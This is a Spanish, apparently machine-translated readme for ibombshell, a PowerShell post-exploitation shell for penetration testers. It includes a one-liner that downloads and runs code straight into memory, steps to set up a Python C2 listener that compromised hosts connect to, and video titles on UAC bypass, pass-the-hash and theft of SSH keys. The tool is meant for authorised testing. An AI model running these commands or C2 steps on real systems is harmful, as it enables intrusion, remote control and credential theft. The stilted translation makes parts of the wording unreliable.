ibombshell, Herramienta para implementar un mensaje de post-explotación en cualquier momento

ibombshell - Dynamic Remote Shell

      ,--.!,    _ ____                  __   _____ __         ____  
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /  
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /  
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /  
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/  

 [+] Starting the console...
 [*] Console ready!

ibombshell es una herramienta escrita en Powershell que le permite tener un aviso en cualquier momento con las funcionalidades posteriores a la explotación (y en algunos casos, la explotación). Es un shell que se descarga directamente a la memoria y proporciona acceso a una gran cantidad de funciones de pentesting. Estas funcionalidades se pueden descargar directamente a la memoria, en forma de una función Powershell. Esta forma de ejecución se conoce como en todas partes .

Además, ibombshell proporciona un segundo modo de ejecución llamado Silenciosamente , por lo que el pentester puede ejecutar una instancia de ibombshell (llamada guerrero ). La computadora comprometida se conectará a un panel C2 a través de HTTP. Por lo tanto, será posible controlar al guerrero y podrá cargar funciones en la memoria que ayudan al pentestro. Esto está sucediendo dentro de la fase posterior a la explotación.

Prerrequisitos

Para ejecutar ibombshell en cualquier lugar , es obligatorio tener PowerShell 3.0 o superior. Para otros sistemas operativos que no sean Windows, puede leer más sobre esto en PowerShell GitHub - ¡ PowerShell para cada sistema! .

Para ejecutar el modo silencioso de ibombshell necesita Python 3.6 y algunas bibliotecas de python. Puedes instalar esto con:

cd ibombshell\ c2/
pip install -r requirements.txt

Nota : ibombshell C2 trabaja en 3.X pitón . Asegúrate de ejecutar un pip en relación con esta versión.

Uso

ibombshell tiene dos modos de ejecución:

ibombshell en todas partes

Para cargar ibombshell simplemente ejecute en PowerShell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)

Ahora puedes ejecutar la consola ibombshell descargada ejecutando:

console

Modo ibombshell en silencio

Esta versión le permite ejecutar la consola ibombshell y controlarla de forma remota desde el panel C2 creado en python. Para ejecutar esta versión, primero debe iniciar el proceso de la consola en powershell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)

En la ruta de ibombshell C2, prepara el C2:

python3 ibombshell.py

Y crea al oyente donde los guerreros se conectarán:

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

El puerto de escucha predeterminado es 8080. Finalmente, puede iniciar la consola en modo silencioso en el host para obtener el control remoto:

console -Silently -uriConsole http://[ip or domain]:[port]

esquema de ibombshell C2

El funcionamiento básico del panel de control de ibombshell sigue el siguiente esquema:

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Estibador

Hemos creado un contenedor acoplable con todo lo que necesita para que funcione. Ejecute este comando desde la ubicación de Dockerfile.

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Videos de ejemplo

Algunos videos de ejemplo ...

iBombShell: PoC Warrior + Omitir UAC + Pasar el hash

iBombShell: macOS

ibombshell: extracción de claves SSH privadas en Windows 10

iBombShell: PoC savefunctions

ibombshell: omite silenciosamente la inyección del entorno UAC

iBombShell - Mocking Trusted Directory

Licencia

Este proyecto está licenciado bajo la Licencia Pública General de GNU - vea el archivo de LICENCIA para más detalles

Contacto

EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESO O IMPLÍCITO, INCLUYENDO PERO NO LIMITADO A LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN PROPÓSITO PARTICULAR Y NO INCUMPLIMIENTO. EN NINGÚN CASO, LOS AUTORES O TITULARES DE DERECHOS DE AUTOR SERÁN RESPONSABLES POR CUALQUIER RECLAMACIÓN, DAÑOS U OTROS RESPONSABILIDADES, YA QUE SEA RESPONSABLE DE UN CONTRATO, CORTE U OTRA MANERA, DERIVADOS DE, FUERA O EN CONEXIÓN CON EL SOFTWARE O EL USO O OTRAS REPARACIONES EN EL SOFTWARE.

Este software no tiene un proceso de control de calidad. Este software es una prueba de concepto.

Si tiene algún problema, puede ponerse en contacto con:

pablo@11paths.com - Ideas Locas CDO - Telefónica

alvaro.nunezromero@11paths.com - Laboratorio Innovación - ElevenPaths

Para obtener más información, visite https://www.elevenpaths.com .